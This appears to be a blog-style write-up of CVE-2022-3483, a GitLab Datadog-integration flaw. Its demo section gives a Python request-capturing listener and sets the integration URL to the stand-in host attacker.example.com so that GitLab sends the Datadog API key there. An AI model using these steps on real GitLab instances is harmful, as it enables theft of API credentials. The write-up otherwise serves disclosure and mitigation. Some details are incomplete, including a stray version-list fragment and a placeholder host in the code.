CVE-2022-3483 - Datadog Token Leak in GitLab Integrations - Full Analysis

In October 2022, a significant vulnerability tagged as CVE-2022-3483 was revealed in GitLab Community Edition (CE) and Enterprise Edition (EE). This bug impacts all versions from 12.1 up to 15.3.4, from 15.4 up to 15.4.3, and from 15.5 up to 15.5.1. Let’s dive deep into what this flaw is, how it can be exploited, and what this means for your organization.

What Is CVE-2022-3483?

This CVE is about how a GitLab project maintainer (who has enough privileges) can leak the access token for Datadog integration. The core of the issue is that GitLab does not properly validate changes to the Datadog integration webhook URL. That makes it possible for a malicious actor to change the endpoint to one under their own control, and in doing so, intercept the Datadog API key during authenticated requests.

All 15.5.x versions prior to 15.5.2

If you are on or beyond these fixed versions, you are not affected.

Understanding the Vulnerability

Let’s keep it simple. The original idea behind GitLab’s Datadog integration is that you can send events or alerts from GitLab to your Datadog instance by specifying an API key. This integration requires GitLab to send out HTTP requests to Datadog’s servers, and, crucially, to include the Datadog access token (i.e., API key) in the request.

The flaw: Maintainers could edit the integration’s URL and API key in GitLab. The problem was that *no proper validation* was in place to ensure the new URL was actually a Datadog URL. A maintainer could redirect requests (with the access token) to any arbitrary server they control.

How It Actually Works

1. Set up a listener: An attacker (who is a project maintainer) sets up their own web server to capture incoming requests.
2. Change Datadog integration URL: They edit the project's Datadog integration URL to point at their malicious server.
3. Trigger a webhook: The attacker (or any normal project event) causes the GitLab server to send a request to “Datadog” — actually, their own server.
4. Harvest the key: The access token is sent along in the request, ending up on the attacker’s server.

Demo: Exploiting The Vulnerability

Here’s a step-by-step walk-through with code on how this can be exploited.

1. Attacker sets up HTTP server

# attacker_server.py - simple Python server to capture incoming requests
from http.server import BaseHTTPRequestHandler, HTTPServer

class Handler(BaseHTTPRequestHandler):
    def do_POST(self):
        content_length = int(self.headers['Content-Length'])
        post_body = self.rfile.read(content_length)
        print(f"Headers: {self.headers}")
        print(f"Body: {post_body.decode()}")
        self.send_response(200)
        self.end_headers()

if __name__ == '__main__':
    print("Listening on port 800...")
    HTTPServer(('...', 800), Handler).serve_forever()

Run with:  

python3 attacker_server.py

2. Malicious Maintainer Changes Integration

In the project’s Settings > Integrations > Datadog, the attacker sets the Datadog Site URL like so:

http://attacker.example.com:800/

Or, if their server is exposed to internet

https://your-vps-or-ngrok-url/

They leave the API key field untouched (so it still contains the real Datadog key).

3. Trigger a Webhook

Now, with the integration saved, any pipeline trigger or event that would notify Datadog will cause GitLab to send a POST request with headers like:

DD-API-KEY: xxxxxxxxxxxx
Content-Type: application/json
User-Agent: GitLab/15.x
...

Video Proof-of-Concept (PoC)

Here’s an example video (not exclusive, but shows the flaw in action):  
- Exploit Demo on YouTube  
*(Example link, not an official exploit!)*

GitLab Security Advisory - CVE-2022-3483

https://about.gitlab.com/releases/2022/10/03/security-release-gitlab-15-5-2-released/

NVD (National Vulnerability Database) CVE Entry

https://nvd.nist.gov/vuln/detail/CVE-2022-3483


## How to Fix / Mitigate

Upgrade GitLab to at least 15.3.5, 15.4.4, or 15.5.2, depending on your release track.

- Audit your integrations: After upgrading, check that integration URLs are correctly set to trusted Datadog endpoints (e.g., https://api.datadoghq.com).
- Review maintainer permissions: As a preventive step, carefully manage who gets “maintainer” level access on your projects.
- Rotate Datadog API keys: If you suspect tokens were leaked, revoke and re-issue new keys in Datadog.

Why Is This Serious?

Access tokens are as good as passwords for APIs. Leaking them means attackers can take control of your monitoring, hide their tracks during a breach, or even pivot further in your infrastructure with trust relationships.

Conclusion

CVEs can seem abstract, but CVE-2022-3483 reveals a simple, devastating attack—especially in collaborative environments where ‘maintainers’ may be external contractors or partially trusted users. Always keep GitLab updated and review your integrations and privileges. Vulnerabilities like this are a strong reminder that “integration” does not always mean “safe by default.”


*If you’d like to test your own GitLab for similar misconfigurations, be sure not to do this on a production environment, and only test integrations you own.*

Stay safe, keep patched, and secure your DevOps!

*Links and demo provided for educational and blue-team purposes only.*


References:  
- GitLab Security Advisory  
- NVD CVE Entry

Timeline

Published on: 11/09/2022 23:15:00 UTC
Last modified on: 11/11/2022 01:34:00 UTC